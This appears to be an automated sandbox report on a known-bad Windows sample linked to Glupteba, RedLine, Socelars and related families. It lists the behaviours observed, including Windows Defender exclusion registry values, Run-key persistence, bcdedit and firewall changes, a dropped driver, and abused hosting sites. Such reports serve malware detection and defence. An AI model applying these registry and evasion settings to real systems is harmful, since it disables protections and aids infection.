Analysis Overview
SHA256
e8b6c5424fa57bb37b5608297e3991d5fa35e128d071f053f848a80a6a9287dd
Threat Level: Known bad
The file e8b6c5424fa57bb37b5608297e3991d5fa35e128d071f053f848a80a6a9287dd was found to be: Known bad.
Malicious Activity Summary
Fabookie
Fabookie family
Glupteba
RedLine
Socelars payload
NullMixer
Redline family
Socelars family
Glupteba family
PrivateLoader
RedLine payload
Detect Fabookie payload
Nullmixer family
Windows security bypass
Socelars
Privateloader family
Modifies boot configuration data using bcdedit
Modifies Windows Firewall
Command and Scripting Interpreter: PowerShell
Possible attempt to disable PatchGuard
Drops file in Drivers directory
Checks computer location settings
Loads dropped DLL
Reads user/profile data of web browsers
Windows security modification
Executes dropped EXE
ASPack v2.12-2.42
Checks installed software on the system
Manipulates WinMon driver.
Looks up external IP address via web service
Manipulates WinMonFS driver.
Legitimate hosting services abused for malware hosting/C2
Looks up geolocation information via web service
Adds Run key to start application
Suspicious use of SetThreadContext
Drops file in Program Files directory
Checks for VirtualBox DLLs, possible anti-VM trick
Drops file in Windows directory
Unsigned PE
Enumerates physical storage devices
Program crash
System Location Discovery: System Language Discovery
Event Triggered Execution: Netsh Helper DLL
Suspicious use of AdjustPrivilegeToken
Modifies data under HKEY_USERS
Uses Task Scheduler COM API
Suspicious behavior: GetForegroundWindowSpam
Suspicious behavior: LoadsDriver
Scheduled Task/Job: Scheduled Task
Modifies Internet Explorer settings
Suspicious use of FindShellTrayWindow
Modifies system certificate store
Kills process with taskkill
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-11-06 10:41
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-06 10:40
Reported
2024-11-06 10:43
Platform
win7-20240903-en
Max time kernel
149s
Max time network
151s
Command Line
Signatures
Detect Fabookie payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Fabookie
Fabookie family
Glupteba
Glupteba family
NullMixer
Nullmixer family
PrivateLoader
Privateloader family
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Redline family
Socelars
Socelars family
Socelars payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Windows security bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\Mon167f9db638e4.exe = "0" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows = "0" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\QuietDarkness = "0" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\wup = "0" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\drivers\Winmon.sys | C:\Windows\rss\csrss.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Possible attempt to disable PatchGuard
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
Windows security modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\QuietDarkness = "0" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\wup = "0" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\Mon167f9db638e4.exe = "0" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows = "0" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Windows\CurrentVersion\Run\QuietDarkness = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Looks up geolocation information via web service
Manipulates WinMon driver.
| Description | Indicator | Process | Target |
| File opened for modification | \??\WinMon | C:\Windows\rss\csrss.exe | N/A |
Manipulates WinMonFS driver.
| Description | Indicator | Process | Target |
| File opened for modification | \??\WinMonFS | C:\Windows\rss\csrss.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2016 set thread context of 2132 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16d070a064013c841.exe | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16d070a064013c841.exe |
| PID 1508 set thread context of 1868 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16734014a69dec.exe | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16734014a69dec.exe |
| PID 804 set thread context of 1596 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16bd4a93b822a.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Checks for VirtualBox DLLs, possible anti-VM trick
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\VBoxMiniRdrDN | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\Gparted\Build.exe | C:\Program Files (x86)\Gparted\Build.sfx.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Gparted\Build.exe | C:\Program Files (x86)\Gparted\Build.sfx.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Gparted\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Gparted\gimagex.exe | C:\Users\Admin\AppData\Local\Temp\is-T2V1R.tmp\Mon16957e622fa390.tmp | N/A |
| File created | C:\Program Files (x86)\Gparted\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-T2V1R.tmp\Mon16957e622fa390.tmp | N/A |
| File created | C:\Program Files (x86)\Gparted\is-UTKGG.tmp | C:\Users\Admin\AppData\Local\Temp\is-T2V1R.tmp\Mon16957e622fa390.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Gparted\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-T2V1R.tmp\Mon16957e622fa390.tmp | N/A |
| File created | C:\Program Files (x86)\Gparted\__tmp_rar_sfx_access_check_259448320 | C:\Program Files (x86)\Gparted\Build.sfx.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Gparted\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Gparted\Build.sfx.exe | C:\Users\Admin\AppData\Local\Temp\is-T2V1R.tmp\Mon16957e622fa390.tmp | N/A |
| File created | C:\Program Files (x86)\Gparted\is-LI9U0.tmp | C:\Users\Admin\AppData\Local\Temp\is-T2V1R.tmp\Mon16957e622fa390.tmp | N/A |
| File created | C:\Program Files (x86)\Gparted\is-QDMNL.tmp | C:\Users\Admin\AppData\Local\Temp\is-T2V1R.tmp\Mon16957e622fa390.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Gparted\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Logs\CBS\CbsPersist_20241106104111.cab | C:\Windows\system32\makecab.exe | N/A |
| File opened for modification | C:\Windows\rss | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| File created | C:\Windows\rss\csrss.exe | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Program Files (x86)\Gparted\Build.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-T2V1R.tmp\Mon16957e622fa390.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Gparted\gimagex.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16ac385cfd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16bd4a93b822a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16d070a064013c841.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\b592fd0fd3806a9adf968d15624da8d617afe9bc857007ef51efb0e0de8e29fa.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon161bd381a14aea5c.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Gparted\Build.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16734014a69dec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1631358b82299bd8.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16e127a54386dd68.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-VI925.tmp\Mon16737798ac26f984.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16734014a69dec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Gparted\Build.sfx.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\WIBCK.eXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16957e622fa390.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16d070a064013c841.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1661118952.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16737798ac26f984.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-24C2L.tmp\Mon16737798ac26f984.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon166dc6040fb8726.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16b7581baf7.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\rss\csrss.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16737798ac26f984.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16e127a54386dd68.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-191 = "Mountain Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-381 = "South Africa Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-841 = "Argentina Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1471 = "Magadan Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-382 = "South Africa Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1042 = "Ulaanbaatar Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-162 = "Central Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-335 = "Jordan Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-262 = "GMT Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1411 = "Syria Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-932 = "Coordinated Universal Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
